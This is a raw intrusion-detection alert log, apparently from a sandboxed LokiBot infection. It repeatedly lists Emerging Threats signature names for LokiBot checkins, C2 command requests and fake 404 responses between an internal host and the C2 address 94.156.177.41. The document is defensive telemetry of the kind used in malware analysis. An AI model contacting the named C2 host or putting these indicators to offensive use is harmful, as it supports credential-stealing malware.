                                                    2024-11-20T11:09:12.012535+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922294.156.177.4180TCP
                                                    2024-11-20T11:09:12.017444+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249222TCP
                                                    2024-11-20T11:09:12.154909+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922394.156.177.4180TCP
                                                    2024-11-20T11:09:12.154909+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922394.156.177.4180TCP
                                                    2024-11-20T11:09:12.154909+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922394.156.177.4180TCP
                                                    2024-11-20T11:09:12.941472+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922394.156.177.4180TCP
                                                    2024-11-20T11:09:12.941472+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922394.156.177.4180TCP
                                                    2024-11-20T11:09:12.950526+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249223TCP
                                                    2024-11-20T11:09:13.118072+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922494.156.177.4180TCP
                                                    2024-11-20T11:09:13.118072+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922494.156.177.4180TCP
                                                    2024-11-20T11:09:13.118072+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922494.156.177.4180TCP
                                                    2024-11-20T11:09:13.866235+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922494.156.177.4180TCP
                                                    2024-11-20T11:09:13.866235+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922494.156.177.4180TCP
                                                    2024-11-20T11:09:13.871527+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249224TCP
                                                    2024-11-20T11:09:14.021635+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922594.156.177.4180TCP
                                                    2024-11-20T11:09:14.021635+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922594.156.177.4180TCP
                                                    2024-11-20T11:09:14.021635+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922594.156.177.4180TCP
                                                    2024-11-20T11:09:14.783519+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922594.156.177.4180TCP
                                                    2024-11-20T11:09:14.783519+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922594.156.177.4180TCP
                                                    2024-11-20T11:09:14.788393+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249225TCP
                                                    2024-11-20T11:09:15.054347+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922694.156.177.4180TCP
                                                    2024-11-20T11:09:15.054347+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922694.156.177.4180TCP
                                                    2024-11-20T11:09:15.054347+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922694.156.177.4180TCP
                                                    2024-11-20T11:09:15.786102+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922694.156.177.4180TCP
                                                    2024-11-20T11:09:15.786102+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922694.156.177.4180TCP
                                                    2024-11-20T11:09:15.791292+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249226TCP
                                                    2024-11-20T11:09:15.957636+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922794.156.177.4180TCP
                                                    2024-11-20T11:09:15.957636+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922794.156.177.4180TCP
                                                    2024-11-20T11:09:15.957636+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922794.156.177.4180TCP
                                                    2024-11-20T11:09:16.810037+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922794.156.177.4180TCP
                                                    2024-11-20T11:09:16.810037+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922794.156.177.4180TCP
                                                    2024-11-20T11:09:16.817569+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249227TCP
                                                    2024-11-20T11:09:16.974548+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922894.156.177.4180TCP
                                                    2024-11-20T11:09:16.974548+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922894.156.177.4180TCP
                                                    2024-11-20T11:09:16.974548+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922894.156.177.4180TCP
                                                    2024-11-20T11:09:17.702031+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922894.156.177.4180TCP
                                                    2024-11-20T11:09:17.702031+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922894.156.177.4180TCP
                                                    2024-11-20T11:09:17.709675+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249228TCP
                                                    2024-11-20T11:09:17.855870+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922994.156.177.4180TCP
                                                    2024-11-20T11:09:17.855870+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922994.156.177.4180TCP
                                                    2024-11-20T11:09:17.855870+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922994.156.177.4180TCP
                                                    2024-11-20T11:09:19.526453+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922994.156.177.4180TCP
                                                    2024-11-20T11:09:19.526453+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922994.156.177.4180TCP
                                                    2024-11-20T11:09:19.527073+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249229TCP
                                                    2024-11-20T11:09:19.681406+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923094.156.177.4180TCP
                                                    2024-11-20T11:09:19.681406+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923094.156.177.4180TCP
                                                    2024-11-20T11:09:19.681406+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923094.156.177.4180TCP
                                                    2024-11-20T11:09:20.420637+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923094.156.177.4180TCP
                                                    2024-11-20T11:09:20.420637+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923094.156.177.4180TCP
                                                    2024-11-20T11:09:20.425799+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249230TCP
                                                    2024-11-20T11:09:20.573695+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923194.156.177.4180TCP
                                                    2024-11-20T11:09:20.573695+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923194.156.177.4180TCP
                                                    2024-11-20T11:09:20.573695+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923194.156.177.4180TCP
                                                    2024-11-20T11:09:21.314955+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923194.156.177.4180TCP
                                                    2024-11-20T11:09:21.314955+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923194.156.177.4180TCP
                                                    2024-11-20T11:09:21.322527+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249231TCP
                                                    2024-11-20T11:09:21.471180+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923294.156.177.4180TCP
                                                    2024-11-20T11:09:21.471180+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923294.156.177.4180TCP
                                                    2024-11-20T11:09:21.471180+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923294.156.177.4180TCP
                                                    2024-11-20T11:09:22.217616+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923294.156.177.4180TCP
                                                    2024-11-20T11:09:22.217616+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923294.156.177.4180TCP
                                                    2024-11-20T11:09:22.223852+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249232TCP
                                                    2024-11-20T11:09:22.364648+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923394.156.177.4180TCP
                                                    2024-11-20T11:09:22.364648+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923394.156.177.4180TCP
                                                    2024-11-20T11:09:22.364648+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923394.156.177.4180TCP
                                                    2024-11-20T11:09:23.254109+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923394.156.177.4180TCP
                                                    2024-11-20T11:09:23.254109+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923394.156.177.4180TCP
                                                    2024-11-20T11:09:23.259068+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249233TCP
                                                    2024-11-20T11:09:23.410559+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923494.156.177.4180TCP
                                                    2024-11-20T11:09:23.410559+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923494.156.177.4180TCP
                                                    2024-11-20T11:09:23.410559+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923494.156.177.4180TCP
                                                    2024-11-20T11:09:24.404461+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923494.156.177.4180TCP
                                                    2024-11-20T11:09:24.404461+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923494.156.177.4180TCP
                                                    2024-11-20T11:09:24.409463+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249234TCP
                                                    2024-11-20T11:09:24.567819+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923594.156.177.4180TCP
                                                    2024-11-20T11:09:24.567819+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923594.156.177.4180TCP
                                                    2024-11-20T11:09:24.567819+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923594.156.177.4180TCP
                                                    2024-11-20T11:09:26.308393+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923594.156.177.4180TCP
                                                    2024-11-20T11:09:26.308393+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923594.156.177.4180TCP
                                                    2024-11-20T11:09:26.573856+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249235TCP
                                                    2024-11-20T11:09:26.583371+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923694.156.177.4180TCP
                                                    2024-11-20T11:09:26.583371+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923694.156.177.4180TCP
                                                    2024-11-20T11:09:26.583371+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923694.156.177.4180TCP
                                                    2024-11-20T11:09:27.498635+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923694.156.177.4180TCP
                                                    2024-11-20T11:09:27.498635+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923694.156.177.4180TCP
                                                    2024-11-20T11:09:27.503716+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249236TCP
                                                    2024-11-20T11:09:27.798263+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923794.156.177.4180TCP
                                                    2024-11-20T11:09:27.798263+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923794.156.177.4180TCP
                                                    2024-11-20T11:09:27.798263+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923794.156.177.4180TCP
                                                    2024-11-20T11:09:28.601487+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923794.156.177.4180TCP
                                                    2024-11-20T11:09:28.601487+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923794.156.177.4180TCP
                                                    2024-11-20T11:09:28.606457+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249237TCP
                                                    2024-11-20T11:09:28.872433+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923894.156.177.4180TCP
                                                    2024-11-20T11:09:28.872433+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923894.156.177.4180TCP
                                                    2024-11-20T11:09:28.872433+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923894.156.177.4180TCP
                                                    2024-11-20T11:09:29.678802+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923894.156.177.4180TCP
                                                    2024-11-20T11:09:29.678802+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923894.156.177.4180TCP
                                                    2024-11-20T11:09:29.686788+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249238TCP
                                                    2024-11-20T11:09:29.853943+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224923994.156.177.4180TCP
                                                    2024-11-20T11:09:29.853943+01002025381ET MALWARE LokiBot Checkin1192.168.2.224923994.156.177.4180TCP
                                                    2024-11-20T11:09:29.853943+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224923994.156.177.4180TCP
                                                    2024-11-20T11:09:30.598870+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224923994.156.177.4180TCP
                                                    2024-11-20T11:09:30.598870+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224923994.156.177.4180TCP
                                                    2024-11-20T11:09:30.608399+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249239TCP
                                                    2024-11-20T11:09:30.933082+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924094.156.177.4180TCP
                                                    2024-11-20T11:09:30.933082+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924094.156.177.4180TCP
                                                    2024-11-20T11:09:30.933082+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924094.156.177.4180TCP
                                                    2024-11-20T11:09:31.681516+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924094.156.177.4180TCP
                                                    2024-11-20T11:09:31.681516+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924094.156.177.4180TCP
                                                    2024-11-20T11:09:31.688133+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249240TCP
                                                    2024-11-20T11:09:31.828472+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924194.156.177.4180TCP
                                                    2024-11-20T11:09:31.828472+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924194.156.177.4180TCP
                                                    2024-11-20T11:09:31.828472+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924194.156.177.4180TCP
                                                    2024-11-20T11:09:32.557261+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924194.156.177.4180TCP
                                                    2024-11-20T11:09:32.557261+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924194.156.177.4180TCP
                                                    2024-11-20T11:09:32.562183+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249241TCP
                                                    2024-11-20T11:09:32.713977+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924294.156.177.4180TCP
                                                    2024-11-20T11:09:32.713977+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924294.156.177.4180TCP
                                                    2024-11-20T11:09:32.713977+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924294.156.177.4180TCP
                                                    2024-11-20T11:09:33.605446+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924294.156.177.4180TCP
                                                    2024-11-20T11:09:33.605446+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924294.156.177.4180TCP
                                                    2024-11-20T11:09:33.610429+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249242TCP
                                                    2024-11-20T11:09:33.926911+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924394.156.177.4180TCP
                                                    2024-11-20T11:09:33.926911+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924394.156.177.4180TCP
                                                    2024-11-20T11:09:33.926911+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924394.156.177.4180TCP
                                                    2024-11-20T11:09:34.675390+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924394.156.177.4180TCP
                                                    2024-11-20T11:09:34.675390+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924394.156.177.4180TCP
                                                    2024-11-20T11:09:34.681360+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249243TCP
                                                    2024-11-20T11:09:34.827985+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924494.156.177.4180TCP
                                                    2024-11-20T11:09:34.827985+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924494.156.177.4180TCP
                                                    2024-11-20T11:09:34.827985+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924494.156.177.4180TCP
                                                    2024-11-20T11:09:35.668171+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924494.156.177.4180TCP
                                                    2024-11-20T11:09:35.668171+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924494.156.177.4180TCP
                                                    2024-11-20T11:09:35.675754+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249244TCP
                                                    2024-11-20T11:09:35.811112+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924594.156.177.4180TCP
                                                    2024-11-20T11:09:35.811112+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924594.156.177.4180TCP
                                                    2024-11-20T11:09:35.811112+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924594.156.177.4180TCP
                                                    2024-11-20T11:09:36.753021+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924594.156.177.4180TCP
                                                    2024-11-20T11:09:36.753021+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924594.156.177.4180TCP
                                                    2024-11-20T11:09:36.757976+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249245TCP
                                                    2024-11-20T11:09:36.907516+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924694.156.177.4180TCP
                                                    2024-11-20T11:09:36.907516+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924694.156.177.4180TCP
                                                    2024-11-20T11:09:36.907516+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924694.156.177.4180TCP
                                                    2024-11-20T11:09:37.666072+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924694.156.177.4180TCP
                                                    2024-11-20T11:09:37.666072+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924694.156.177.4180TCP
                                                    2024-11-20T11:09:37.673948+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249246TCP
                                                    2024-11-20T11:09:37.827332+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924794.156.177.4180TCP
                                                    2024-11-20T11:09:37.827332+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924794.156.177.4180TCP
                                                    2024-11-20T11:09:37.827332+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924794.156.177.4180TCP
                                                    2024-11-20T11:09:38.569971+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924794.156.177.4180TCP
                                                    2024-11-20T11:09:38.569971+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924794.156.177.4180TCP
                                                    2024-11-20T11:09:38.574890+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249247TCP
                                                    2024-11-20T11:09:38.717822+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924894.156.177.4180TCP
                                                    2024-11-20T11:09:38.717822+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924894.156.177.4180TCP
                                                    2024-11-20T11:09:38.717822+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924894.156.177.4180TCP
                                                    2024-11-20T11:09:39.499696+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924894.156.177.4180TCP
                                                    2024-11-20T11:09:39.499696+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924894.156.177.4180TCP
                                                    2024-11-20T11:09:39.504812+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249248TCP
                                                    2024-11-20T11:09:39.652336+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224924994.156.177.4180TCP
                                                    2024-11-20T11:09:39.652336+01002025381ET MALWARE LokiBot Checkin1192.168.2.224924994.156.177.4180TCP
                                                    2024-11-20T11:09:39.652336+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224924994.156.177.4180TCP
                                                    2024-11-20T11:09:40.469131+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224924994.156.177.4180TCP
                                                    2024-11-20T11:09:40.469131+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224924994.156.177.4180TCP
                                                    2024-11-20T11:09:40.474031+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249249TCP
                                                    2024-11-20T11:09:40.609403+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925094.156.177.4180TCP
                                                    2024-11-20T11:09:40.609403+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925094.156.177.4180TCP
                                                    2024-11-20T11:09:40.609403+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925094.156.177.4180TCP
                                                    2024-11-20T11:09:41.391468+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925094.156.177.4180TCP
                                                    2024-11-20T11:09:41.391468+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925094.156.177.4180TCP
                                                    2024-11-20T11:09:41.398933+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249250TCP
                                                    2024-11-20T11:09:41.549340+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925194.156.177.4180TCP
                                                    2024-11-20T11:09:41.549340+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925194.156.177.4180TCP
                                                    2024-11-20T11:09:41.549340+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925194.156.177.4180TCP
                                                    2024-11-20T11:09:42.303354+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925194.156.177.4180TCP
                                                    2024-11-20T11:09:42.303354+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925194.156.177.4180TCP
                                                    2024-11-20T11:09:42.310054+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249251TCP
                                                    2024-11-20T11:09:42.611715+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925294.156.177.4180TCP
                                                    2024-11-20T11:09:42.611715+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925294.156.177.4180TCP
                                                    2024-11-20T11:09:42.611715+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925294.156.177.4180TCP
                                                    2024-11-20T11:09:43.481518+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925294.156.177.4180TCP
                                                    2024-11-20T11:09:43.481518+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925294.156.177.4180TCP
                                                    2024-11-20T11:09:43.487717+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249252TCP
                                                    2024-11-20T11:09:43.638686+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925394.156.177.4180TCP
                                                    2024-11-20T11:09:43.638686+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925394.156.177.4180TCP
                                                    2024-11-20T11:09:43.638686+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925394.156.177.4180TCP
                                                    2024-11-20T11:09:44.496461+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925394.156.177.4180TCP
                                                    2024-11-20T11:09:44.496461+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925394.156.177.4180TCP
                                                    2024-11-20T11:09:44.514314+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249253TCP
                                                    2024-11-20T11:09:44.672058+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925494.156.177.4180TCP
                                                    2024-11-20T11:09:44.672058+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925494.156.177.4180TCP
                                                    2024-11-20T11:09:44.672058+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925494.156.177.4180TCP
                                                    2024-11-20T11:09:45.552873+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925494.156.177.4180TCP
                                                    2024-11-20T11:09:45.552873+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925494.156.177.4180TCP
                                                    2024-11-20T11:09:45.560204+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249254TCP
                                                    2024-11-20T11:09:45.977790+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925594.156.177.4180TCP
                                                    2024-11-20T11:09:45.977790+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925594.156.177.4180TCP
                                                    2024-11-20T11:09:45.977790+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925594.156.177.4180TCP
                                                    2024-11-20T11:09:46.836511+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925594.156.177.4180TCP
                                                    2024-11-20T11:09:46.836511+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925594.156.177.4180TCP
                                                    2024-11-20T11:09:46.843780+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249255TCP
                                                    2024-11-20T11:09:47.076413+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925694.156.177.4180TCP
                                                    2024-11-20T11:09:47.076413+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925694.156.177.4180TCP
                                                    2024-11-20T11:09:47.076413+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925694.156.177.4180TCP
                                                    2024-11-20T11:09:47.805329+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925694.156.177.4180TCP
                                                    2024-11-20T11:09:47.805329+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925694.156.177.4180TCP
                                                    2024-11-20T11:09:47.813495+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249256TCP
                                                    2024-11-20T11:09:48.084264+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925794.156.177.4180TCP
                                                    2024-11-20T11:09:48.084264+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925794.156.177.4180TCP
                                                    2024-11-20T11:09:48.084264+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925794.156.177.4180TCP
                                                    2024-11-20T11:09:48.830988+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925794.156.177.4180TCP
                                                    2024-11-20T11:09:48.830988+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925794.156.177.4180TCP
                                                    2024-11-20T11:09:48.835847+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249257TCP
                                                    2024-11-20T11:09:48.976620+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925894.156.177.4180TCP
                                                    2024-11-20T11:09:48.976620+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925894.156.177.4180TCP
                                                    2024-11-20T11:09:48.976620+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925894.156.177.4180TCP
                                                    2024-11-20T11:09:49.845370+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925894.156.177.4180TCP
                                                    2024-11-20T11:09:49.845370+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925894.156.177.4180TCP
                                                    2024-11-20T11:09:49.850273+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249258TCP
                                                    2024-11-20T11:09:49.991081+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224925994.156.177.4180TCP
                                                    2024-11-20T11:09:49.991081+01002025381ET MALWARE LokiBot Checkin1192.168.2.224925994.156.177.4180TCP
                                                    2024-11-20T11:09:49.991081+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224925994.156.177.4180TCP
                                                    2024-11-20T11:09:50.739485+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224925994.156.177.4180TCP
                                                    2024-11-20T11:09:50.739485+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224925994.156.177.4180TCP
